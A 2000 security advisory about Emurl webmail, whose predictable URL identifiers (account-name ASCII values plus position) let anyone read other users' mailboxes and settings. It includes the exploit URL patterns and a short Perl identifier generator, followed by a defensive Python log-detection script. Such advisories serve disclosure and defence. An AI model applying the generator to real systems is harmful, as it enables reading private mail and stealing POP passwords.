Vulnerability in EMURL-based e-mail providers

2000-05-16T00:00:00
ID SECURITYVULNS:DOC:198
Type securityvulns
Reporter Securityvulns
Modified 2000-05-16T00:00:00

Description

Affected Product: Emurl 2.0 For Windows NT 4.0 (possibly others)

Product information: Emurl is a web-based email host developed by SeattleLab. http://www1.seattlelab.com/emurl/

Impact: Users can access the mailbox contents of anybody on the system. They can also steal their POP passwords since Emurl allows you to fetch your POP email from more than one source.

Description: After logging into my new mail account powered by the Emurl software, this URL struck me:

http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123

I guess you all know where this is going. First, this identifier is based solely on your account name. Therefore, if you create an account with the same name on another site, you'll end up with the very same identifier.

Furthermore, this identifier can easily be determined since it is "encoded" using the ASCII value of each character of the account's name, incremented by its position.

In this example, my user ID would be PBenoit and my resulting identifier would be 113100104114116111123.

    p = 112 + 1 = 113
    b =  98 + 2 = 100
    e = 101 + 3 = 104
    n = 110 + 4 = 114
    o = 111 + 5 = 116
    i = 105 + 6 = 111
    t = 116 + 7 = 123

You could fetch the e-mails here

http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier>

... and view/change the account's settings here

http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier>

I threw a few lines of perl together to generate this.

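    # Read an account name and print the identifier Emurl derives from it
    print "Enter your ID: ";
    $_ = lc(<STDIN>);
    chomp;
    print "Your identifier is: ";
    @letters = split(//, $_);
    for ($i = 0; $i < length($_); $i++) {
        # ASCII value of the character plus its 1-based position
        $mychar = ord($letters[$i]) + $i + 1;
        # pad two-digit values to three digits
        if ($mychar < 100) { $mychar = (0).$mychar; }
        print $mychar
    }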

Vendor status: SeattleLab is aware and the issue is addressed in their next version.
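
A log check for the identifier scheme described above, added here as an example (not part of the original advisory or SeattleLab's code): it decodes USER= values from web server logs back to account names and lists clients that requested more than one mailbox. The log line layout, the sample addresses and account names, and the one-account threshold are assumptions; clients behind a shared proxy will need a higher threshold.

```python
import re
from collections import defaultdict

# Matches the USER parameter on the two Emurl endpoints named in the advisory.
USER_RE = re.compile(
    r"/scripts/emurl/(?:RECMAN|MAKEHTML_M)\.dll\?\S*?\bUSER=(\d+)", re.I)

def decode_identifier(ident):
    """Invert the scheme: 3-digit groups, each ASCII value + 1-based position."""
    if not ident or len(ident) % 3:
        return None
    chars = []
    for pos, i in enumerate(range(0, len(ident), 3), start=1):
        code = int(ident[i:i + 3]) - pos
        if not 32 < code < 127:      # not a printable account-name character
            return None
        chars.append(chr(code))
    return "".join(chars)

def accounts_per_client(log_lines):
    """Map client address -> set of account names whose identifiers it requested."""
    seen = defaultdict(set)
    for line in log_lines:
        m = USER_RE.search(line)
        if not m:
            continue
        client = line.split()[0]     # assumption: client address is the first field
        name = decode_identifier(m.group(1))
        seen[client].add(name if name else "<undecodable:%s>" % m.group(1))
    return seen

def suspicious_clients(log_lines, max_accounts=1):
    """Clients that touched more mailboxes than a single user should."""
    return {ip: sorted(names)
            for ip, names in accounts_per_client(log_lines).items()
            if len(names) > max_accounts}

# Constructed sample log lines (layout, addresses and accounts are made up).
SAMPLE_LOG = [
    "192.0.2.10 GET /scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123 200",
    "192.0.2.10 GET /scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=113100104114116111123 200",
    "198.51.100.7 GET /scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=098110108103106 200",
    "198.51.100.7 GET /scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=099113101 200",
    "198.51.100.7 GET /scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=099113101 200",
]

if __name__ == "__main__":
    for ip, names in suspicious_clients(SAMPLE_LOG).items():
        print(ip, "requested mailboxes for:", ", ".join(names))
```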

